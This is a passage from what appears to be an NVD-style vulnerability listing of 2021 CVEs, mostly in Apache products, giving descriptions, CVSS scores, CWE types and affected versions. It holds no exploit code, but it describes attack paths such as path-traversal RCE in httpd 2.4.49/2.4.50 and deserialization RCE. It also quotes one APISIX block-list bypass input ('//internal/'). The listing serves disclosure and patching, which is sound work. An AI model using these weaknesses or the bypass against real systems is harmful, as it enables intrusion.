redhat enterprise_linux_workstation 7.0
netapp storagegrid -
redhat enterprise_linux_for_ibm_z_systems_eus 8.4
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.8
siemens sinema_remote_connect_server *
redhat enterprise_linux_server_aus 8.6
redhat enterprise_linux_update_services_for_sap_solutions 8.8
siemens sinec_nms *
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 7.6
siemens ruggedcom_nms *
f5 f5os *
redhat enterprise_linux_eus 8.6
redhat enterprise_linux_for_arm_64 8.0
redhat enterprise_linux_eus 8.1
debian debian_linux 11.0
redhat enterprise_linux_for_power_little_endian_eus 8.6
redhat enterprise_linux_server_aus 7.7
tenable tenable.sc *
redhat enterprise_linux_server_aus 8.4
redhat enterprise_linux_for_ibm_z_systems 7.0_s390x
redhat enterprise_linux_server_aus 8.2
redhat enterprise_linux_server_tus 8.2
oracle instantis_enterprisetrack 17.2
redhat enterprise_linux_for_arm_64_eus 8.6
redhat software_collections 1.0
CVE-2021-40439 MEDIUM

Apache OpenOffice has a dependency on expat software. Versions prior to 2.1.0 were subject to CVE-2013-0340 a "Billion Laughs" entity expansion denial of service attack and exploit via crafted XML files. ODF files consist of a set of XML files. All versions of Apache OpenOffice up to 4.1.10 are subject to this issue. expat in version 4.1.11 is patched.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,CWE-611,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-40525 MEDIUM

Apache James ManagedSieve implementation alongside with the file storage for sieve scripts is vulnerable to path traversal, allowing reading and writing any file. This vulnerability had been patched in Apache James 3.6.1 and higher. We recommend the upgrade. Distributed and Cassandra based products are also not impacted.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,CWE-22,

Products Affected

Vendor Product Version
apache james *
CVE-2021-40690 MEDIUM

All versions of Apache Santuario - XML Security for Java prior to 2.2.3 and 2.1.7 are vulnerable to an issue where the "secureValidation" property is not passed correctly when creating a KeyInfo from a KeyInfoReference element. This allows an attacker to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-200,

Products Affected

Vendor Product Version
oracle retail_service_backbone 15.0.3.1
oracle peoplesoft_enterprise_peopletools 8.59
apache tomee *
oracle commerce_guided_search 11.3.2
oracle retail_service_backbone 16.0.3
oracle retail_bulk_data_integration 16.0.3
apache santuario_xml_security_for_java *
oracle retail_integration_bus 14.1.3.2
debian debian_linux 10.0
oracle retail_integration_bus 16.0.3
oracle retail_merchandising_system 16.0.3
oracle peoplesoft_enterprise_peopletools 8.58
oracle retail_financial_integration 15.0.3.1
oracle agile_plm 9.3.6
oracle communications_diameter_intelligence_hub *
oracle retail_integration_bus 15.0.3.1
oracle weblogic_server 12.2.1.4.0
oracle retail_service_backbone 19.0.1
apache cxf 3.4.4
oracle retail_merchandising_system 19.0.1
oracle commerce_platform 11.3.2
debian debian_linux 9.0
oracle retail_financial_integration 19.0.1
debian debian_linux 11.0
oracle retail_financial_integration 16.0.3
oracle retail_integration_bus 19.0.1
oracle outside_in_technology 8.5.5
oracle retail_service_backbone 14.1.3.2
oracle weblogic_server 14.1.1.0.0
oracle communications_messaging_server 8.1
oracle flexcube_private_banking 12.1.0
oracle retail_financial_integration 14.1.3.2
CVE-2021-40865 HIGH

An Unsafe Deserialization vulnerability exists in the worker services of the Apache Storm supervisor server allowing pre-auth Remote Code Execution (RCE). Apache Storm 2.2.x users should upgrade to version 2.2.1 or 2.3.0. Apache Storm 2.1.x users should upgrade to version 2.1.1. Apache Storm 1.x users should upgrade to version 1.2.4

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache storm *
CVE-2021-4104 MEDIUM

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache log4j 1.2
oracle business_process_management_suite 12.2.1.3.0
oracle enterprise_manager_base_platform 13.4.0.0
redhat jboss_enterprise_application_platform 6.0.0
oracle advanced_supply_chain_planning 12.1
oracle communications_unified_inventory_management 7.4.2
oracle tuxedo 12.2.2.0.0
oracle e-business_suite_cloud_manager_and_cloud_backup_module 2.2.1.1.1
redhat enterprise_linux 6.0
oracle business_intelligence 12.2.1.4.0
oracle financial_services_revenue_management_and_billing_analytics 2.8.0.0
oracle goldengate -
oracle business_intelligence 5.9.0.0.0
redhat software_collections -
oracle communications_offline_mediation_controller *
oracle weblogic_server 12.2.1.3.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.1
oracle identity_management_suite 12.2.1.3.0
oracle retail_allocation 15.0.3.1
redhat enterprise_linux 8.0
oracle communications_unified_inventory_management 7.3.5
redhat integration_camel_k -
redhat jboss_fuse 6.0.0
oracle fusion_middleware_common_libraries_and_tools 12.2.1.4.0
oracle communications_offline_mediation_controller 12.0.0.5.0
redhat jboss_operations_network 3.0
redhat jboss_a-mq 6.0.0
redhat jboss_a-mq_streaming -
redhat enterprise_linux 7.0
oracle utilities_testing_accelerator 6.0.0.3.1
redhat openshift_container_platform 4.6
redhat jboss_a-mq 7
redhat jboss_fuse 7.0.0
oracle advanced_supply_chain_planning 12.2
oracle weblogic_server 14.1.1.0.0
redhat openshift_container_platform 4.7
oracle utilities_testing_accelerator 6.0.0.1.1
oracle communications_eagle_ftp_table_base_retrieval 4.5
redhat jboss_enterprise_application_platform 7.0
redhat openshift_application_runtimes -
oracle communications_unified_inventory_management 7.3.4
oracle hyperion_infrastructure_technology *
oracle retail_allocation 14.1.3.2
redhat jboss_fuse_service_works 6.0
oracle enterprise_manager_base_platform 13.5.0.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle hyperion_data_relationship_management *
redhat jboss_data_grid 7.0.0
redhat jboss_web_server 3.0
oracle utilities_testing_accelerator 6.0.0.2.2
oracle mysql_enterprise_monitor *
redhat jboss_data_virtualization 6.0.0
oracle timesten_grid -
oracle stream_analytics -
oracle weblogic_server 12.2.1.4.0
oracle identity_management_suite 12.2.1.4.0
oracle jdeveloper 12.2.1.3.0
oracle business_intelligence 12.2.1.3.0
oracle healthcare_data_repository 8.1.0
redhat integration_camel_quarkus -
oracle retail_allocation 16.0.3
oracle retail_allocation 19.0.1
oracle communications_network_integrity 7.3.6
oracle retail_extract_transform_and_load 13.2.5
redhat codeready_studio 12.0
redhat single_sign-on 7.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.0
oracle business_process_management_suite 12.2.1.4.0
redhat process_automation 7.0
oracle communications_messaging_server 8.1
redhat openshift_container_platform 4.8
CVE-2021-41079 MEDIUM

Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-835,

Products Affected

Vendor Product Version
apache tomcat *
debian debian_linux 9.0
debian debian_linux 10.0
debian debian_linux 11.0
netapp management_services_for_element_software_and_netapp_hci -
CVE-2021-41303 HIGH

Apache Shiro before 1.8.0, when using Apache Shiro with Spring Boot, a specially crafted HTTP request may cause an authentication bypass. Users should update to Apache Shiro 1.8.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
apache shiro *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
CVE-2021-41524 MEDIUM

While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,CWE-476,

Products Affected

Vendor Product Version
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
apache http_server 2.4.49
oracle instantis_enterprisetrack 17.1
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
CVE-2021-41532 MEDIUM

In Apache Ozone before 1.2.0, Recon HTTP endpoints provide access to OM, SCM and Datanode metadata. Due to a bug, any unauthenticated user can access the data from these endpoints.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-41561 MEDIUM

Improper Input Validation vulnerability in Parquet-MR of Apache Parquet allows an attacker to DoS by malicious Parquet files. This issue affects Apache Parquet-MR version 1.9.0 and later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-20,

Products Affected

Vendor Product Version
apache parquet_java *
apache parquet-mr *
CVE-2021-41571 MEDIUM

In Apache Pulsar it is possible to access data from BookKeeper that does not belong to the topics accessible by the authenticated user. The Admin API get-message-by-id requires the user to input a topic and a ledger id. The ledger id is a pointer to the data, and it is supposed to be a valid it for the topic. Authorisation controls are performed against the topic name and there is not proper validation the that ledger id is valid in the context of such ledger. So it may happen that the user is able to read from a ledger that contains data owned by another tenant. This issue affects Apache Pulsar Apache Pulsar version 2.8.0 and prior versions; Apache Pulsar version 2.7.3 and prior versions; Apache Pulsar version 2.6.4 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,CWE-863,

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.8.0
CVE-2021-41585 MEDIUM

Improper Input Validation vulnerability in accepting socket connections in Apache Traffic Server allows an attacker to make the server stop accepting new connections. This issue affects Apache Traffic Server 5.0.0 to 9.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2021-41616 HIGH

Apache DB DdlUtils 1.0 included a BinaryObjectsHelper that was intended for use when migrating database data with a SQL data type of BINARY, VARBINARY, LONGVARBINARY, or BLOB between databases using the ddlutils features. The BinaryObjectsHelper class was insecure and used ObjectInputStream.readObject without validating that the input data was safe to deserialize. Please note that DdlUtils is no longer being actively developed. To address the insecurity of the BinaryObjectHelper class, the following changes to DdlUtils have been made: (1) BinaryObjectsHelper.java has been deleted from the DdlUtils source repository and the DdlUtils feature of propagating data of SQL binary types is therefore no longer present in DdlUtils; (2) The ddlutils-1.0 release has been removed from the Apache Release Distribution Infrastructure; (3) The DdlUtils web site has been updated to indicate that DdlUtils is now available only as source code, not as a packaged release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache ddlutils 1.0
CVE-2021-41766 MEDIUM

Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented. The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache karaf *
CVE-2021-41767 MEDIUM

Apache Guacamole 1.3.0 and older may incorrectly include a private tunnel identifier in the non-private details of some REST responses. This may allow an authenticated user who already has permission to access a particular connection to read from or interact with another user's active use of that same connection.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-200,

Products Affected

Vendor Product Version
apache guacamole *
CVE-2021-41773 MEDIUM

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,CWE-22,

Products Affected

Vendor Product Version
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
apache http_server 2.4.49
oracle instantis_enterprisetrack 17.1
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
CVE-2021-41830 MEDIUM

It is possible for an attacker to manipulate signed documents and macros to appear to come from a trusted source. All versions of Apache OpenOffice up to 4.1.10 are affected. Users are advised to update to version 4.1.11. See CVE-2021-25633 for the LibreOffice advisory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-347,CWE-347,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-41831 MEDIUM

It is possible for an attacker to manipulate the timestamp of signed documents. All versions of Apache OpenOffice up to 4.1.10 are affected. Users are advised to update to version 4.1.11. See CVE-2021-25634 for the LibreOffice advisory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-347,CWE-347,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-41832 MEDIUM

It is possible for an attacker to manipulate documents to appear to be signed by a trusted source. All versions of Apache OpenOffice up to 4.1.10 are affected. Users are advised to update to version 4.1.11. See CVE-2021-25635 for the LibreOffice advisory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-347,CWE-347,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-41971 MEDIUM

Apache Superset up to and including 1.3.0 when configured with ENABLE_TEMPLATE_PROCESSING on (disabled by default) allowed SQL injection when a malicious authenticated user sends an http request with a custom URL.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,CWE-89,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-41972 MEDIUM

Apache Superset up to and including 1.3.1 allowed for database connections password leak for authenticated users. This information could be accessed in a non-trivial way.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-41973 MEDIUM

In Apache MINA, a specifically crafted, malformed HTTP request may cause the HTTP Header decoder to loop indefinitely. The decoder assumed that the HTTP Header begins at the beginning of the buffer and loops if there is more data than expected. Please update MINA to 2.1.5 or greater.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,CWE-835,

Products Affected

Vendor Product Version
oracle fusion_middleware_common_libraries_and_tools 12.2.1.3.0
oracle banking_payments 14.5
oracle communications_cloud_native_core_console 1.9.0
oracle banking_trade_finance_process_management 14.5
oracle flexcube_universal_banking *
oracle fusion_middleware_common_libraries_and_tools 12.2.1.4.0
oracle fusion_middleware_common_libraries_and_tools 14.1.1.0.0
oracle flexcube_universal_banking 14.5
oracle banking_treasury_management 14.5
apache mina *
oracle customer_management_and_segmentation_foundation 18.0
oracle oss_support_tools 2.12.42
oracle customer_management_and_segmentation_foundation 19.0
CVE-2021-42009 MEDIUM

An authenticated Apache Traffic Control Traffic Ops user with Portal-level privileges can send a request with a specially-crafted email subject to the /deliveryservices/request Traffic Ops endpoint to send an email, from the Traffic Ops server, with an arbitrary body to an arbitrary email address. Apache Traffic Control 5.1.x users should upgrade to 5.1.3 or 6.0.0. 4.1.x users should upgrade to 5.1.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-20,

Products Affected

Vendor Product Version
apache traffic_control *
CVE-2021-42010

Heron versions <= 0.20.4-incubating allows CRLF log injection because of the lack of escaping in the log statements. Please update to version 0.20.5-incubating which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache heron *
CVE-2021-42013 HIGH

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,CWE-22,NVD-CWE-Other,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server 2.4.50
netapp cloud_backup -
fedoraproject fedora 34
oracle jd_edwards_enterpriseone_tools *
oracle secure_backup *
apache http_server 2.4.49
oracle instantis_enterprisetrack 17.1
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
CVE-2021-42250 MEDIUM

Improper output neutralization for Logs. A specific Apache Superset HTTP endpoint allowed for an authenticated user to forge log entries or inject malicious content into logs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-117,CWE-116,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-42340 MEDIUM

The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-772,CWE-772,

Products Affected

Vendor Product Version
apache tomcat 10.1.0
oracle retail_store_inventory_management 15.0.3.3
oracle retail_store_inventory_management 16.0.3.7
apache tomcat 10.0.0
oracle agile_engineering_data_management 6.2.1.0
oracle retail_customer_insights 16.0.2
oracle communications_diameter_signaling_router *
oracle managed_file_transfer 12.2.1.4.0
netapp hci -
oracle retail_customer_insights 15.0.2
oracle retail_eftlink 21.0.0
oracle big_data_spatial_and_graph *
apache tomcat *
oracle retail_store_inventory_management 14.1.3.5
oracle sd-wan_edge 9.1
oracle retail_store_inventory_management 15.0.3.8
oracle retail_data_extractor_for_merchandising 15.0.2
oracle payment_interface 20.3
oracle taleo_platform *
oracle middleware_common_libraries_and_tools 12.2.1.4.0
oracle payment_interface 19.1
oracle retail_financial_integration 16.0.1
oracle sd-wan_edge 9.0
debian debian_linux 11.0
netapp management_services_for_element_software -
oracle retail_financial_integration 19.0.0
oracle retail_store_inventory_management 14.1.3.14
oracle hospitality_cruise_shipboard_property_management_system 20.1.0
oracle managed_file_transfer 12.2.1.3.0
oracle retail_store_inventory_management 14.0.4.13
oracle retail_data_extractor_for_merchandising 16.0.2
CVE-2021-42357 MEDIUM

When using Apache Knox SSO prior to 1.6.1, a request could be crafted to redirect a user to a malicious page due to improper URL parsing. A request that included a specially crafted request parameter could be used to redirect the user to a page controlled by an attacker. This URL would need to be presented to the user outside the normal request flow through a XSS or phishing campaign.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache knox *
CVE-2021-43045 MEDIUM

A vulnerability in the .NET SDK of Apache Avro allows an attacker to allocate excessive resources, potentially causing a denial-of-service attack. This issue affects .NET applications using Apache Avro version 1.10.2 and prior versions. Users should update to version 1.11.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,CWE-770,

Products Affected

Vendor Product Version
apache avro *
CVE-2021-43082 HIGH

Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in the stats-over-http plugin of Apache Traffic Server allows an attacker to overwrite memory. This issue affects Apache Traffic Server 9.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-120,CWE-120,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2021-43083 MEDIUM

Apache PLC4X - PLC4C (Only the C language implementation was effected) was vulnerable to an unsigned integer underflow flaw inside the tcp transport. Users should update to 0.9.1, which addresses this issue. However, in order to exploit this vulnerability, a user would have to actively connect to a mallicious device which could send a response with invalid content. Currently we consider the probability of this being exploited as quite minimal, however this could change in the future, especially with the industrial networks growing more and more together.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,CWE-191,CWE-191,

Products Affected

Vendor Product Version
apache plc4x *
CVE-2021-43297 HIGH

A deserialization vulnerability existed in dubbo hessian-lite 3.2.11 and its earlier versions, which could lead to malicious code execution. Most Dubbo users use Hessian2 as the default serialization/deserialization protocol, during Hessian catch unexpected exceptions, Hessian will log out some imformation for users, which may cause remote command execution. This issue affects Apache Dubbo Apache Dubbo 2.6.x versions prior to 2.6.12; Apache Dubbo 2.7.x versions prior to 2.7.15; Apache Dubbo 3.0.x versions prior to 3.0.5.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-43350 HIGH

An unauthenticated Apache Traffic Control Traffic Ops user can send a request with a specially-crafted username to the POST /login endpoint of any API version to inject unsanitized content into the LDAP filter.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-90,CWE-74,

Products Affected

Vendor Product Version
apache traffic_control *
apache traffic_control 5.1.4
apache traffic_control 6.0.1
CVE-2021-43410 MEDIUM

Apache Airavata Django Portal allows CRLF log injection because of lack of escaping log statements. In particular, some HTTP request parameters are logged without first being escaped. Versions affected: master branch before commit 3c5d8c7 [1] of airavata-django-portal [1] https://github.com/apache/airavata-django-portal/commit/3c5d8c72bfc3eb0af8693a655a5d60f9273f8170

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-117,CWE-116,

Products Affected

Vendor Product Version
apache airavata_django_portal *
CVE-2021-43557 MEDIUM

The uri-block plugin in Apache APISIX before 2.10.2 uses $request_uri without verification. The $request_uri is the full original request URI without normalization. This makes it possible to construct a URI to bypass the block list on some occasions. For instance, when the block list contains "^/internal/", a URI like `//internal/` can be used to bypass it. Some other plugins also have the same issue. And it may affect the developer's custom plugin.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache apisix *
CVE-2021-43980

The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N 2.2 1.4

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2021-43999 MEDIUM

